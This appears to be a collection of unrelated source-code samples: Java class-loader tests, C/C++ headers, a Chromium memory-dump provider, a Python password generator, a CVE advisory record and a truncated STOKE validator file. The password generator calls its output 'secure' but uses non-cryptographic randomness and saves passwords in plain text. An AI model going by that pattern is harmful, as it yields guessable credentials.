JarClassLoader jcl = new JarClassLoader(Collections.singletonList(dir), new ProxyClassLoader[0]);
assertStreamContent(jcl.getResourceAsStream("package/resource.txt"), "content");
assertStreamContent(jcl.getResourceAsStream("/package/resource.txt"), "content");
assertStreamContent(jcl.getResourceAsStream("resource.txt"), "content");
assertStreamContent(jcl.getResourceAsStream("/resource.txt"), "content");
assertStreamContent(jcl.getResourceAsStream("META-INF/services/resource.txt"), "content");
assertStreamContent(jcl.getResourceAsStream("/META-INF/services/resource.txt"), "content");
assertURLsContent(jcl.getResources("package/resource.txt"), "content");
assertURLsContent(jcl.getResources("/package/resource.txt"), "content");
assertURLsContent(jcl.getResources("resource.txt"), "content");
assertURLsContent(jcl.getResources("/resource.txt"), "content");
}
public void testJarURLConnection() throws Exception {
File jar = new File(getWorkDir(), "default-package-resource.jar");
TestFileUtils.writeZipFile(jar, "META-INF/MANIFEST.MF:Manifest-Version: 1.0\nfoo: bar\n\n", "package/re source++.txt:content");
JarClassLoader jcl = new JarClassLoader(Collections.singletonList(jar), new ProxyClassLoader[0]);
URL url = jcl.getResource("package/re source++.txt");
assertTrue(url.toString(), url.toString().endsWith("default-package-resource.jar!/package/re%20source++.txt"));
URLConnection conn = url.openConnection();
assertEquals(7, conn.getContentLength());
assertTrue(conn instanceof JarURLConnection);
JarURLConnection jconn = (JarURLConnection) conn;
assertEquals("package/re source++.txt", jconn.getEntryName());
assertEquals(Utilities.toURI(jar).toURL(), jconn.getJarFileURL());
assertEquals("bar", jconn.getMainAttributes().getValue("foo"));
assertEquals(jar.getAbsolutePath(), jconn.getJarFile().getName());
}
public void testAddURLMethod() throws Exception {
File jar = new File(getWorkDir(), "default-package-resource.jar");
TestFileUtils.writeZipFile(jar, "META-INF/MANIFEST.MF:Manifest-Version: 1.0\nfoo: bar\n\n", "package/re source++.txt:content");
JarClassLoader jcl = new JarClassLoader(Collections.<File>emptyList(), new ProxyClassLoader[0]);
jcl.addURL(Utilities.toURI(jar).toURL());
URL url = jcl.getResource("package/re source++.txt");
assertTrue(url.toString(), url.toString().endsWith("default-package-resource.jar!/package/re%20source++.txt"));
URLConnection conn = url.openConnection();
assertEquals(7, conn.getContentLength());
assertTrue(conn instanceof JarURLConnection);
JarURLConnection jconn = (JarURLConnection) conn;
assertEquals("package/re source++.txt", jconn.getEntryName());
assertEquals(Utilities.toURI(jar).toURL(), jconn.getJarFileURL());
assertEquals("bar", jconn.getMainAttributes().getValue("foo"));
assertEquals(jar.getAbsolutePath(), jconn.getJarFile().getName());
}
public void testResourceDefinition() throws Exception { // #196595
File jar = new File(getWorkDir(), "some.jar");
TestFileUtils.writeZipFile(jar, "package/resource.txt:content");
ClassLoader cl = new JarClassLoader(Collections.singletonList(jar), new ProxyClassLoader[0]);
URL r = cl.getResource("package/resource.txt");
assertNotNull(r);
assertStreamContent(r.openStream(), "content");
assertEquals(cl, r.getContent(new Class<?>[] {ClassLoader.class}));
}
public void testMetaInfServicesUsesGetContentCL() throws Exception {
final ClassLoader parent = MetaInfServicesToken.class.getClassLoader().getParent();
class JDKOnly extends ClassLoader {
@Override
public Class<?> loadClass(String name) throws ClassNotFoundException {
return parent.loadClass(name);
}
@Override
protected synchronized Class<?> loadClass(String name, boolean resolve) throws ClassNotFoundException {
return parent.loadClass(name);
}
@Override
public URL getResource(String name) {
return parent.getResource(name);
}
@Override
public InputStream getResourceAsStream(String name) {
return parent.getResourceAsStream(name);
}
@Override
public Enumeration<URL> getResources(String name) throws IOException {
return parent.getResources(name);
}
}
ClassLoader jdkonly = new JDKOnly();
File jar = new File(getWorkDir(), "some.jar");
TestFileUtils.writeZipFile(
jar,
"META-INF/services/java.io.Serializable:org.netbeans.MetaInfServicesToken"
);
URL url = MetaInfServicesToken.class.getProtectionDomain().getCodeSource().getLocation();
URLClassLoader one = new URLClassLoader(new URL[] { url }, jdkonly);
URLClassLoader two = new URLClassLoader(new URL[] { url }, jdkonly);
final String name = MetaInfServicesToken.class.getName();
Class<?> cOne = one.loadClass(name);
Class<?> cTwo = two.loadClass(name);
if (cOne == cTwo) {
fail("Classes should be different, not loaded by: " + cOne.getClassLoader());
}
ClassLoader cl = new JarClassLoader(Collections.singletonList(jar), new ClassLoader[] { two });
ProxyClassLoader all = new ProxyClassLoader(new ClassLoader[] { one, cl }, false);
Object res = Lookups.metaInfServices(all).lookup(Serializable.class);
assertNotNull("One serializable found", res);
assertEquals("It is from the second classloader", cTwo, res.getClass());
}
private void assertURLsContent(Enumeration<URL> urls, String ... contents) throws IOException {
for (String content : contents) {
assertTrue("Enough entries", urls.hasMoreElements());
assertStreamContent(urls.nextElement().openStream(), content);
}
assertFalse("Too many entries", urls.hasMoreElements());
}
private void assertStreamContent(InputStream str, String content) throws IOException {
assertNotNull("Resource found", str);
byte[] data = new byte[content.length()];
DataInputStream dis = new DataInputStream(str);
try {
dis.readFully(data);
} finally {
dis.close();
}
assertEquals(new String(data), content);
}
public void interruptImpl(int toInterrupt) throws Exception {
File jar = new File(getWorkDir(), "interrupted-reading.jar");
TestFileUtils.writeZipFile(jar, "resource.txt:content");
final JarClassLoader jcl = new JarClassLoader(Collections.singletonList(jar), new ProxyClassLoader[0]);
jcl.releaseJars();
// now we have a JarClassLoader with no jars open, let't catch
// him opening a jar
final Semaphore controlSemaphore = new Semaphore(0);
final Object[] results = new Object[2];
Semaphore readSemaphore = new Semaphore(0);
BlockingSecurityManager.initialize(jar.toString(), readSemaphore);
class Tester extends Thread {
int slot;
Tester(int slot) throws Exception {
this.slot = slot;
start();
controlSemaphore.acquire();
}
public void run() {
controlSemaphore.release(); // we're about to start blocking
try {
URL url = jcl.getResource("resource.txt");
assertNotNull(url);
results[slot] = url;
} catch (Throwable t) {
results[slot] = t;
}
}
};
Thread[] threads = new Thread[] { new Tester(0), new Tester(1) };
// threads[0] has reached the blocking point while opening the jar
// threads[1] is blocking in callGet()
Thread.sleep(100); // for sure
threads[toInterrupt].interrupt(); // interrupt the selected thread
readSemaphore.release(1000); // let the read proceed
// wait for them to finish the work
for (Thread t : threads) t.join();
assertTrue("Should be URL: " + results[0], results[0] instanceof URL);
assertTrue("Should be URL: " + results[1], results[1] instanceof URL);
}
public void testCanInterruptOpeningThread() throws Exception {
interruptImpl(0); // try interrupting the opening thread
}
public void testCanInterruptWaitingThread() throws Exception {
interruptImpl(1); // try interrupting the waiting thread
}
private static class BlockingSecurityManager extends SecurityManager {
private static String path;
private static Semaphore sync;
public static void initialize(String path, Semaphore sync) {
BlockingSecurityManager.path = path;
BlockingSecurityManager.sync = sync;
if (System.getSecurityManager() instanceof BlockingSecurityManager) {
// ok
} else {
System.setSecurityManager(new BlockingSecurityManager());
}
}
public @Override void checkRead(String file) {
if (file.equals(path)) {
sync.acquireUninterruptibly();
}
}
public @Override void checkRead(String file, Object context) {
checkRead(file);
}
public @Override void checkPermission(Permission perm) {}
public @Override void checkPermission(Permission perm, Object ctx) {}
}
}
| 7,298 |
855 | // Copyright 2017 Google Inc. All Rights Reserved.
//
// Use of this source code is governed by an MIT-style
// license that can be found in the LICENSE file or at
// https://opensource.org/licenses/MIT.
#ifndef PIK_GAMMA_CORRECT_H_
#define PIK_GAMMA_CORRECT_H_
// Deprecated: sRGB transfer function. Use color_management.h instead.
#include <cmath>
#include "pik/compiler_specific.h"
namespace pik {
// Values are in [0, 255].
static PIK_INLINE double Srgb8ToLinearDirect(double srgb8) {
if (srgb8 <= 0.0) return 0.0;
if (srgb8 <= 10.31475) return srgb8 / 12.92;
if (srgb8 >= 255.0) return 255.0;
const double srgb01 = srgb8 / 255.0;
const double linear01 = std::pow((srgb01 + 0.055) / 1.055, 2.4);
return linear01 * 255.0;
}
// Values are in [0, 255].
static PIK_INLINE double LinearToSrgb8Direct(double linear) {
if (linear <= 0.0) return 0.0;
if (linear >= 255.0) return 255.0;
if (linear <= 10.31475 / 12.92) return linear * 12.92;
const double linear01 = linear / 255.0;
const double srgb01 = std::pow(linear01, 1.0 / 2.4) * 1.055 - 0.055;
return srgb01 * 255.0;
}
} // namespace pik
#endif // PIK_GAMMA_CORRECT_H_
| 451 |
562 | #include <librttopo.h>
#include <stdio.h>
int main(void) {
printf("%s\n", rtgeom_version());
return 0;
}
| 57 |
14,668 | // Copyright 2015 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "sql/sql_memory_dump_provider.h"
#include "base/trace_event/memory_dump_manager.h"
#include "base/trace_event/process_memory_dump.h"
#include "third_party/sqlite/sqlite3.h"
namespace sql {
// static
SqlMemoryDumpProvider* SqlMemoryDumpProvider::GetInstance() {
return base::Singleton<
SqlMemoryDumpProvider,
base::LeakySingletonTraits<SqlMemoryDumpProvider>>::get();
}
SqlMemoryDumpProvider::SqlMemoryDumpProvider() = default;
SqlMemoryDumpProvider::~SqlMemoryDumpProvider() = default;
bool SqlMemoryDumpProvider::OnMemoryDump(
const base::trace_event::MemoryDumpArgs& args,
base::trace_event::ProcessMemoryDump* pmd) {
sqlite3_int64 memory_used = 0;
sqlite3_int64 memory_high_water = 0;
int status = sqlite3_status64(SQLITE_STATUS_MEMORY_USED, &memory_used,
&memory_high_water, /* resetFlag= */ 1);
if (status != SQLITE_OK)
return false;
base::trace_event::MemoryAllocatorDump* dump =
pmd->CreateAllocatorDump("sqlite");
dump->AddScalar(base::trace_event::MemoryAllocatorDump::kNameSize,
base::trace_event::MemoryAllocatorDump::kUnitsBytes,
memory_used);
dump->AddScalar("malloc_high_wmark_size",
base::trace_event::MemoryAllocatorDump::kUnitsBytes,
memory_high_water);
sqlite3_int64 dummy_high_water = -1;
sqlite3_int64 malloc_count = -1;
status = sqlite3_status64(SQLITE_STATUS_MALLOC_COUNT, &malloc_count,
&dummy_high_water, /* resetFlag= */ 0);
if (status == SQLITE_OK) {
dump->AddScalar("malloc_count",
base::trace_event::MemoryAllocatorDump::kUnitsObjects,
malloc_count);
}
const char* system_allocator_name =
base::trace_event::MemoryDumpManager::GetInstance()
->system_allocator_pool_name();
if (system_allocator_name) {
pmd->AddSuballocation(dump->guid(), system_allocator_name);
}
return true;
}
} // namespace sql
| 910 |
1,026 | <filename>Random_Password_Generator/PasswordGenerator.py
import random
chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()-=_+`~[]{]\|;:,<.>/?'
welcomeMessage = "Welcome to the Password Generator!"
detailsMessage = "This program will generate a secure password using a random arrangement of letters (CAPS ON & caps off), numbers, and punctuations."
creatorMessage = "Created by <NAME> on October 3rd, 2018."
print(welcomeMessage + '\n' + detailsMessage + '\n' + creatorMessage + '\n')
exitMessage = 0
passwordGeneratorUsage = 1
passwordGeneratorPrompt = 1
while exitMessage != 1:
while passwordGeneratorUsage == 1:
passwordGeneratorPrompt = 1
passwordNum = input('How many passwords would you like to generate? ')
passwordNum = int(passwordNum)
passwordLength = input('How long will the password(s) be? ')
passwordLength = int(passwordLength)
print('\n')
print('Here are your password(s): \n')
passwordFile = open('Passwords.txt', 'w')
for p in range(passwordNum):
password = ''
for c in range(passwordLength):
password += random.choice(chars)
print(password)
passwordFile.write(password + '\n')
passwordFile.close()
print('\n')
while passwordGeneratorPrompt == 1:
getContinue = input('Do you want to use the Password Generator again? (Y/N)')
print('\n')
if getContinue == "Y" or getContinue == "y":
passwordGeneratorPrompt = 0
print('\n')
elif getContinue == "N" or getContinue == "n":
exitMessage = 1
passwordGeneratorUsage = 0
passwordGeneratorPrompt = 0
else:
print("Please enter 'Y' or 'N.'\n")
print('\n')
print('Thank you for using the Password Generator. Have a nice day!')
| 895 |
1,461 | // Copyright (c) The HLSL2GLSLFork Project Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE.txt file.
#pragma once
#include <string>
#include "hlsl2glsl.h"
namespace hlslang {
namespace MetalCodeGen {
/// Generic opaque handle. This type is used for handles to the parser/translator.
/// If handle creation fails, 0 will be returned.
class MslCrossCompiler;
}} // namespace
typedef hlslang::MetalCodeGen::MslCrossCompiler* MetalShHandle;
/// Initialize the HLSL2GLSL translator. This function must be called once prior to calling any other
/// HLSL2GLSL translator functions
/// \return
/// 1 on success, 0 on failure
SH_IMPORT_EXPORT int C_DECL Hlsl2Msl_Initialize();
/// Shutdown the HLSL2GLSL translator. This function should be called to de-initialize the HLSL2GLSL
/// translator and should only be called once on shutdown.
SH_IMPORT_EXPORT void C_DECL Hlsl2Msl_Shutdown();
/// Construct a compiler for the given language (one per shader)
SH_IMPORT_EXPORT MetalShHandle C_DECL Hlsl2Msl_ConstructCompiler( const EShLanguage language );
SH_IMPORT_EXPORT void C_DECL Hlsl2Msl_DestructCompiler( MetalShHandle handle );
/// Parse HLSL shader to prepare it for final translation.
/// \param callbacks
/// File read callback for #include processing. If NULL is passed, then #include directives will result in error.
/// \param options
/// Flags of TTranslateOptions
SH_IMPORT_EXPORT int C_DECL Hlsl2Msl_Parse(
const MetalShHandle handle,
const char* shaderString,
ETargetVersion targetVersion,
Hlsl2Glsl_ParseCallbacks* callbacks,
unsigned options);
/// After parsing a HLSL shader, do the final translation to GLSL.
SH_IMPORT_EXPORT int C_DECL Hlsl2Msl_Translate(
const MetalShHandle handle,
const char* entry,
ETargetVersion targetVersion,
unsigned options);
/// After translating HLSL shader(s), retrieve the translated GLSL source.
SH_IMPORT_EXPORT const char* C_DECL Hlsl2Msl_GetShader( const MetalShHandle handle );
SH_IMPORT_EXPORT const char* C_DECL Hlsl2Msl_GetInfoLog( const MetalShHandle handle );
/// After translating, retrieve the number of uniforms
SH_IMPORT_EXPORT int C_DECL Hlsl2Msl_GetUniformCount( const MetalShHandle handle );
/// After translating, retrieve the uniform info table
SH_IMPORT_EXPORT const ShUniformInfo* C_DECL Hlsl2Msl_GetUniformInfo( const MetalShHandle handle );
/// Instead of mapping HLSL attributes to GLSL fixed-function attributes, this function can be used to
/// override the attribute mapping. This tells the code generator to use user-defined attributes for
/// the semantics that are specified.
///
/// \param handle
/// Handle to the compiler. This should be called BEFORE calling Hlsl2Msl_Translate
/// \param pSemanticEnums
/// Array of semantic enums to set
/// \param pSemanticNames
/// Array of user attribute names to use
/// \param nNumSemantics
/// Number of semantics to set in the arrays
/// \return
/// 1 on success, 0 on failure
SH_IMPORT_EXPORT int C_DECL Hlsl2Msl_SetUserAttributeNames ( MetalShHandle handle,
const EAttribSemantic *pSemanticEnums,
const char *pSemanticNames[],
int nNumSemantics );
SH_IMPORT_EXPORT bool C_DECL Hlsl2Msl_VersionUsesPrecision (ETargetVersion version);
| 1,234 |
347 | #pragma once
#include <vector>
#include <map>
#include "srwlock.h"
class CSmartRenameManager :
public ISmartRenameManager,
public ISmartRenameRegExEvents
{
public:
// IUnknown
IFACEMETHODIMP QueryInterface(_In_ REFIID iid, _Outptr_ void** resultInterface);
IFACEMETHODIMP_(ULONG) AddRef();
IFACEMETHODIMP_(ULONG) Release();
// ISmartRenameManager
IFACEMETHODIMP Advise(_In_ ISmartRenameManagerEvents* renameOpEvent, _Out_ DWORD *cookie);
IFACEMETHODIMP UnAdvise(_In_ DWORD cookie);
IFACEMETHODIMP Start();
IFACEMETHODIMP Stop();
IFACEMETHODIMP Reset();
IFACEMETHODIMP Shutdown();
IFACEMETHODIMP Rename(_In_ HWND hwndParent);
IFACEMETHODIMP AddItem(_In_ ISmartRenameItem* pItem);
IFACEMETHODIMP GetItemByIndex(_In_ UINT index, _COM_Outptr_ ISmartRenameItem** ppItem);
IFACEMETHODIMP GetItemById(_In_ int id, _COM_Outptr_ ISmartRenameItem** ppItem);
IFACEMETHODIMP GetItemCount(_Out_ UINT* count);
IFACEMETHODIMP GetSelectedItemCount(_Out_ UINT* count);
IFACEMETHODIMP GetRenameItemCount(_Out_ UINT* count);
IFACEMETHODIMP get_flags(_Out_ DWORD* flags);
IFACEMETHODIMP put_flags(_In_ DWORD flags);
IFACEMETHODIMP get_renameRegEx(_COM_Outptr_ ISmartRenameRegEx** ppRegEx);
IFACEMETHODIMP put_renameRegEx(_In_ ISmartRenameRegEx* pRegEx);
IFACEMETHODIMP get_renameItemFactory(_COM_Outptr_ ISmartRenameItemFactory** ppItemFactory);
IFACEMETHODIMP put_renameItemFactory(_In_ ISmartRenameItemFactory* pItemFactory);
// ISmartRenameRegExEvents
IFACEMETHODIMP OnSearchTermChanged(_In_ PCWSTR searchTerm);
IFACEMETHODIMP OnReplaceTermChanged(_In_ PCWSTR replaceTerm);
IFACEMETHODIMP OnFlagsChanged(_In_ DWORD flags);
static HRESULT s_CreateInstance(_Outptr_ ISmartRenameManager** ppsrm);
protected:
CSmartRenameManager();
virtual ~CSmartRenameManager();
HRESULT _Init();
void _Cleanup();
void _Cancel();
void _OnItemAdded(_In_ ISmartRenameItem* renameItem);
void _OnUpdate(_In_ ISmartRenameItem* renameItem);
void _OnError(_In_ ISmartRenameItem* renameItem);
void _OnRegExStarted(_In_ DWORD threadId);
void _OnRegExCanceled(_In_ DWORD threadId);
void _OnRegExCompleted(_In_ DWORD threadId);
void _OnRenameStarted();
void _OnRenameCompleted();
void _ClearEventHandlers();
void _ClearSmartRenameItems();
static DWORD _GetDefaultFileOpFlags();
HRESULT _PerformRegExRename();
HRESULT _PerformFileOperation();
HRESULT _CreateRegExWorkerThread();
void _CancelRegExWorkerThread();
void _WaitForRegExWorkerThread();
HRESULT _CreateFileOpWorkerThread();
HRESULT _EnsureRegEx();
HRESULT _InitRegEx();
void _ClearRegEx();
// Thread proc for performing the regex rename of each item
static DWORD WINAPI s_regexWorkerThread(_In_ void* pv);
// Thread proc for performing the actual file operation that does the file rename
static DWORD WINAPI s_fileOpWorkerThread(_In_ void* pv);
static LRESULT CALLBACK s_msgWndProc(_In_ HWND hwnd, _In_ UINT uMsg, _In_ WPARAM wParam, _In_ LPARAM lParam);
LRESULT _WndProc(_In_ HWND hwnd, _In_ UINT msg, _In_ WPARAM wParam, _In_ LPARAM lParam);
HANDLE m_regExWorkerThreadHandle = nullptr;
HANDLE m_startRegExWorkerEvent = nullptr;
HANDLE m_cancelRegExWorkerEvent = nullptr;
HANDLE m_fileOpWorkerThreadHandle = nullptr;
HANDLE m_startFileOpWorkerEvent = nullptr;
CSRWLock m_lockEvents;
CSRWLock m_lockItems;
DWORD m_flags = 0;
DWORD m_cookie = 0;
DWORD m_regExAdviseCookie = 0;
struct RENAME_MGR_EVENT
{
ISmartRenameManagerEvents* pEvents;
DWORD cookie;
};
CComPtr<ISmartRenameItemFactory> m_spItemFactory;
CComPtr<ISmartRenameRegEx> m_spRegEx;
_Guarded_by_(m_lockEvents) std::vector<RENAME_MGR_EVENT> m_renameManagerEvents;
_Guarded_by_(m_lockItems) std::map<int, ISmartRenameItem*> m_renameItems;
// Parent HWND used by IFileOperation
HWND m_hwndParent = nullptr;
HWND m_hwndMessage = nullptr;
CRITICAL_SECTION m_critsecReentrancy;
long m_refCount;
}; | 1,637 |
634 | <gh_stars>100-1000
/*
* Copyright 2000-2015 JetBrains s.r.o.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.intellij.ui;
import com.intellij.openapi.application.Application;
import org.intellij.lang.annotations.JdkConstants;
import javax.annotation.Nonnull;
import java.awt.*;
/**
* @author egor
*/
public interface SuitableFontProvider {
@Nonnull
static SuitableFontProvider getInstance() {
return Application.get().getInstance(SuitableFontProvider.class);
}
Font getFontAbleToDisplay(char c, int size, @JdkConstants.FontStyle int style, @Nonnull String defaultFontFamily);
}
| 325 |
892 | <filename>advisories/unreviewed/2022/05/GHSA-x5hg-q2vc-mxfh/GHSA-x5hg-q2vc-mxfh.json
{
"schema_version": "1.2.0",
"id": "GHSA-x5hg-q2vc-mxfh",
"modified": "2022-05-12T00:01:28Z",
"published": "2022-05-12T00:01:28Z",
"aliases": [
"CVE-2021-26372"
],
"details": "Insufficient bound checks related to PCIE in the System Management Unit (SMU) may result in access to an invalid address space that could result in denial of service.",
"severity": [
],
"affected": [
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-26372"
},
{
"type": "WEB",
"url": "https://www.amd.com/en/corporate/product-security/bulletin/amd-sb-1027"
},
{
"type": "WEB",
"url": "https://www.amd.com/en/corporate/product-security/bulletin/amd-sb-1028"
}
],
"database_specific": {
"cwe_ids": [
],
"severity": null,
"github_reviewed": false
}
} | 447 |
460 | <gh_stars>100-1000
#include "../../tools/qmeegographicssystemhelper/qmeegoswitchevent.h"
| 37 |
645 | // Copyright 2013-2015 Stanford University
//
// Licensed under the Apache License, Version 2.0 (the License);
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an AS IS BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#include <regex>
#include "src/validator/handlers/pseudo_handler.h"
using namespace stoke;
using namespace x64asm;
using namespace std;
const vector<string> PseudoHandler::supported_regex_ = {
"^\\.move_([0-9]{3})_([0-9]{3})_([^_]*)_([^_]*)_([^_]*)$",
"^\\.set_(af|of|sf|zf|cf|pf)$",
"^\\.clear_(af|of|sf|zf|cf|pf)$",
"^\\.set_szp_for_(.*)$",
"^\\.read_(af|of|sf|zf|cf|pf)_into_([^_]*)$",
"^\\.move_byte_([0-9]+)_of_([^_]*)_to_([^_]*)$",
"^\\.move_([^_]*)_to_byte_([0-9]+)_of_([^_]*)$",
"^\\.write_([^_]*)_to_(af|of|sf|zf|cf|pf)$",
"^\\.move_(128|032)_(128|032)_([^_]*)_([^_]*)_([^_]*)_([^_]*)_([^_]*)$",
"^\\.move_(128|64)_(128|64)_([^_]*)_([^_]*)_([^_]*)$",
};
const map<string, Eflags> eflag_map_ = {
{"of", Constants::eflags_of()},
{"zf", Constants::eflags_zf()},
{"sf", Constants::eflags_sf()},
{"af", Constants::eflags_af()},
{"pf", Constants::eflags_pf()},
{"cf", Constants::eflags_cf()},
};
const map<string, Operand> reg_map_ = {
{"al", Constants::al()},
{"cl", Constants::cl()},
{"dl", Constants::dl()},
{"bl", Constants::bl()},
{"ah", Constants::ah()},
{"ch", Constants::ch()},
{"dh", Constants::dh()},
{"bh", Constants::bh()},
{"spl", Constants::spl()},
{"bpl", Constants::bpl()},
{"sil", Constants::sil()},
{"dil", Constants::dil()},
{"r8b", Constants::r8b()},
{"r9b", Constants::r9b()},
{"r10b", Constants::r10b()},
{"r11b", Constants::r11b()},
{"r12b", Constants::r12b()},
{"r13b", Constants::r13b()},
{"r14b", Constants::r14b()},
{"r15b", Constants::r15b()},
{"ax", Constants::ax()},
{"cx", Constants::cx()},
{"dx", Constants::dx()},
{"bx", Constants::bx()},
{"sp", Constants::sp()},
{"bp", Constants::bp()},
{"si", Constants::si()},
{"di", Constants::di()},
{"r8w", Constants::r8w()},
{"r9w", Constants::r9w()},
{"r10w", Constants::r10w()},
{"r11w", Constants::r11w()},
{"r12w", Constants::r12w()},
{"r13w", Constants::r13w()},
{"r14w", Constants::r14w()},
{"r15w", Constants::r15w()},
{"eax", Constants::eax()},
{"ecx", Constants::ecx()},
{"edx", Constants::edx()},
{"ebx", Constants::ebx()},
{"esp", Constants::esp()},
{"ebp", Constants::ebp()},
{"esi", Constants::esi()},
{"edi", Constants::edi()},
{"r8d", Constants::r8d()},
{"r9d", Constants::r9d()},
{"r10d", Constants::r10d()},
{"r11d", Constants::r11d()},
{"r12d", Constants::r12d()},
{"r13d", Constants::r13d()},
{"r14d", Constants::r14d()},
{"r15d", Constants::r15d()},
{"rax", Constants::rax()},
{"rcx", Constants::rcx()},
{"rdx", Constants::rdx()},
{"rbx", Constants::rbx()},
{"rsp", Constants::rsp()},
{"rbp", Constants::rbp()},
{"rsi", Constants::rsi()},
{"rdi", Constants::rdi()},
{"r8", Constants::r8()},
{"r9", Constants::r9()},
{"r10", Constants::r10()},
{"r11", Constants::r11()},
{"r12", Constants::r12()},
{"r13", Constants::r13()},
{"r14", Constants::r14()},
{"r15", Constants::r15()},
{"xmm0", Constants::xmm0()},
{"xmm1", Constants::xmm1()},
{"xmm2", Constants::xmm2()},
{"xmm3", Constants::xmm3()},
{"xmm4", Constants::xmm4()},
{"xmm5", Constants::xmm5()},
{"xmm6", Constants::xmm6()},
{"xmm7", Constants::xmm7()},
{"xmm8", Constants::xmm8()},
{"xmm9", Constants::xmm9()},
{"xmm10", Constants::xmm10()},
{"xmm11", Constants::xmm11()},
{"xmm12", Constants::xmm12()},
{"xmm13", Constants::xmm13()},
{"xmm14", Constants::xmm14()},
{"xmm15", Constants::xmm15()},
{"ymm0", Constants::ymm0()},
{"ymm1", Constants::ymm1()},
{"ymm2", Constants::ymm2()},
{"ymm3", Constants::ymm3()},
{"ymm4", Constants::ymm4()},
{"ymm5", Constants::ymm5()},
{"ymm6", Constants::ymm6()},
{"ymm7", Constants::ymm7()},
{"ymm8", Constants::ymm8()},
{"ymm9", Constants::ymm9()},
{"ymm10", Constants::ymm10()},
{"ymm11", Constants::ymm11()},
{"ymm12", Constants::ymm12()},
{"ymm13", Constants::ymm13()},
{"ymm14", Constants::ymm14()},
{"ymm15", Constants::ymm15()},
};
Handler::SupportLevel PseudoHandler::get_support(const Instruction& instr) {
if (instr.get_opcode() == CALL_LABEL) {
auto lbl = instr.get_operand<Label>(0).get_text();
for (auto lbl_regex : supported_regex_) {
regex r(lbl_regex);
if (regex_match(lbl, r)) {
return (Handler::SupportLevel)(SupportLevel::BASIC | SupportLevel::CEG);
}
}
}
return SupportLevel::NONE;
}
void PseudoHandler::build_circuit(const Instruction& instr, SymState& ss) {
error_ = "";
if (!get_support(instr)) {
error_ = "Instruction not supported by pseudo handler";
return;
}
auto lbl = instr.get_operand<Label>(0).get_text();
// split move
smatch result;
regex split_move_r(supported_regex_[0]);
if (regex_match(lbl, result, split_move_r)) {
auto from = stoi(result[1]);
auto to = stoi(result[2]);
auto r0 = reg_map_.at(result[3]);
auto r1 = reg_map_.at(result[4]);
auto r2 = reg_map_.at(result[5]);
if (from > to) {
assert(from == 2*to);
assert(r0.size() == from);
assert(r1.size() == to);
assert(r2.size() == to);
ss.set(r1, ss[r0][to-1][0]);
ss.set(r2, ss[r0][2*to-1][to]);
return;
} else {
assert(2*from == to);
assert(r0.size() == from);
assert(r1.size() == from);
assert(r2.size() == to);
ss.set(r2, ss[r1][from-1][0] || ss[r0][from-1][0]);
return;
}
}
// set eflag
regex set_flag_r(supported_regex_[1]);
if (regex_match(lbl, result, set_flag_r)) {
auto flag = eflag_map_.at(result[1]);
ss.set(flag, SymBool::constant(true));
return;
}
// clear eflag
regex clear_flag_r(supported_regex_[2]);
if (regex_match(lbl, result, clear_flag_r)) {
auto flag = eflag_map_.at(result[1]);
ss.set(flag, SymBool::constant(false));
return;
}
// set flags according to result
regex flags_acc_res_r(supported_regex_[3]);
if (regex_match(lbl, result, flags_acc_res_r)) {
auto reg = reg_map_.at(result[1]);
ss.set_szp_flags(ss[reg], reg.size());
return;
}
// read flags into a gp register
regex read_flag_r(supported_regex_[4]);
if (regex_match(lbl, result, read_flag_r)) {
auto flag = eflag_map_.at(result[1]);
auto reg = reg_map_.at(result[2]);
ss.set(reg, SymBitVector::constant(63, 0) || SymBitVector::from_bool(ss[flag]));
return;
}
// move a single byte from a gp
regex byte_from_gp_r(supported_regex_[5]);
if (regex_match(lbl, result, byte_from_gp_r)) {
auto i = stoi(result[1]);
auto from = reg_map_.at(result[2]);
auto to = reg_map_.at(result[3]);
ss.set(to, ss[from][(i+1)*8-1][i*8]);
return;
}
// move a single byte to a gp
regex byte_to_gp_r(supported_regex_[6]);
if (regex_match(lbl, result, byte_to_gp_r)) {
auto from = reg_map_.at(result[1]);
auto i = stoi(result[2]);
auto to = reg_map_.at(result[3]);
if ((i+1)*8 == to.size()) {
ss.set(to, ss[from] || ss[to][i*8-1][0]);
} else if (i == 0) {
ss.set(to, ss[to][to.size()-1][(i+1)*8] || ss[from]);
} else {
ss.set(to, ss[to][to.size()-1][(i+1)*8] || ss[from] || ss[to][i*8-1][0]);
}
return;
}
// write a flag based on a gp register (last bit)
regex write_flag_r(supported_regex_[7]);
if (regex_match(lbl, result, write_flag_r)) {
auto reg = reg_map_.at(result[1]);
auto flag = eflag_map_.at(result[2]);
ss.set(flag, ss[reg][0]);
return;
}
// 4 way split move of vector register
regex split_move_4x_r(supported_regex_[8]);
if (regex_match(lbl, result, split_move_4x_r)) {
auto from = stoi(result[1]);
auto to = stoi(result[2]);
auto r0 = reg_map_.at(result[3]);
auto r1 = reg_map_.at(result[4]);
auto r2 = reg_map_.at(result[5]);
auto r3 = reg_map_.at(result[6]);
auto r4 = reg_map_.at(result[7]);
if (from > to) {
assert(from == 128);
assert(to == 32);
// assert(r0.size() == 128);
// assert(r1.size() == 128);
// assert(r2.size() == 128);
// assert(r3.size() == 128);
// assert(r4.size() == 128);
if (r1.size() == 128) {
ss.set(r1, SymBitVector::constant(to*3, 0) || ss[r0][1*to-1][0*to]);
ss.set(r2, SymBitVector::constant(to*3, 0) || ss[r0][2*to-1][1*to]);
ss.set(r3, SymBitVector::constant(to*3, 0) || ss[r0][3*to-1][2*to]);
ss.set(r4, SymBitVector::constant(to*3, 0) || ss[r0][4*to-1][3*to]);
} else {
ss.set(r1, ss[r0][1*to-1][0*to]);
